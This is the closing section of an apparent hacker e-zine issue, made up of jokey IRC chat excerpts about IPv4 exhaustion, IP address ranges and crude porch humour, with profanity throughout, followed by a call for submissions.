If you would like to weigh in on the interview, the LIGATT controversy, or anything related to
LIGATT, Gregory D. Evans, or the leak, our contact information is in the introduction - we will
publish intelligent arguments and opinions (both for and against) in the next issue.

[==================================================================================================]

-=[ 0x0e Et Cetera, Etc.
-=[ Author: teh crew

In the absence of any real miscellaneous content, why not take a look at some of the shenanigans
that go on in the good ol' #gny.

We're competent!  We promise!
----------------------------------------------------------------------------------------------------
[16:22] It is expected on February 3rd, 2011, that there will be a formal announcement in the US that IPv4 addresses have been completely exhausted
[16:23] yes
[16:23] but they finished today
[16:23] who got the last one?
[16:23] fucked if i know
[16:23] was it 999.999.999.999
[16:23] but I would sell it
[16:23] oliverjhudson93, I hope you are trolling
[16:23] cause otherwise
[16:23] that was the most retarded thing
[16:23] I have ever heard
[16:23] nah i'm pulling your leg :P
[16:23] good
[16:23] (im joking)
[16:24] cough liar
[16:24] you are joking about lying?
[16:24] i'm joking about joking?
[16:24] I don't know anymore
[16:24] I'm gonna DDoS 127.0.0.1 D:
[16:25] oliverjhudson93, what is the highest IP someone could have?
[16:25] not even taking into account the limits set in place for broadcasts blah blah blah
[16:25] straight up, highest IP address
[16:25] 255
[16:26] I don't actually know
[16:26] but i figure
[16:26] 255.255.255.255?
[16:26] but thats like
[16:26] subnet mask or some shit that I don't understand
[16:26] technically it's 256.256.256.256
[16:26] but as we have limits imposed
[16:26] yes
[16:26] 255.255.255.255
[16:26] See I dun goof'd!
[16:27] urr no
[16:27] it is 0-255
[16:27] yea I fubar'd
[16:27] because that is the range of values you can store in an 8bit number
[16:27] you don't know
[16:27] how hard
[16:27] I headdesked
[16:27] after I typed that
[16:27] :P
[16:27] I am embarrassed for you
[16:27] and was hoping no one would catch it

A shitty situation
----------------------------------------------------------------------------------------------------
[21:58] <&elchupathingy> storm would you be pissed if i took a shit on your porch?
[22:05] <~Silks> what if I were to?
[22:06] <&storm> i would be curious to see that since i don't have a porch
[22:06] <~Silks> what do you have that I could shit on?
[22:07] <&storm> the dorm building has a stoop, i guess
[22:07] <&storm> well, not really actually
[22:08] <~Silks> what about siblings?
[22:08] <~Silks> do you have a sister?
[22:08] <&storm> i'm an only child
[22:08] <&storm> :(
[22:08] <~Silks> ditto
[22:08] <~Silks> however that means you have a lot of stuff
[22:08] <~Silks> and therefore a lot of things to be fouled
[22:09] <&storm> this is very true
[22:10] <&elchupathingy> what if
[22:10] <&elchupathingy> we built a porch
[22:10] <&elchupathingy> then shit on it
[22:10] <&storm> i like your thinking

GTFO emo storm
----------------------------------------------------------------------------------------------------
[01:12] sometimes i message myself to check if i'm still connected
[01:13] that sounds depressing as hell

We could go on, but that would only embarrass us more.  And everyone knows the first rule to being a
sooper l33t h4xx0r klan is to only portray yourselves as FUCKING HARDCORE MOTHERFUCKERS.

Yeah, whatever.

So, yeah.  Looks like the end of issue #4 - hope you liked it.  Like always, if you'd like to submit
content for future issues, our contact information is in the introduction.  The call for papers for
issue #5 is now open, so get your crap in.

See you in the summer.

<3, the gny crew
irc.gonullyourself.org +6697 #gny

[==================================================================================================]
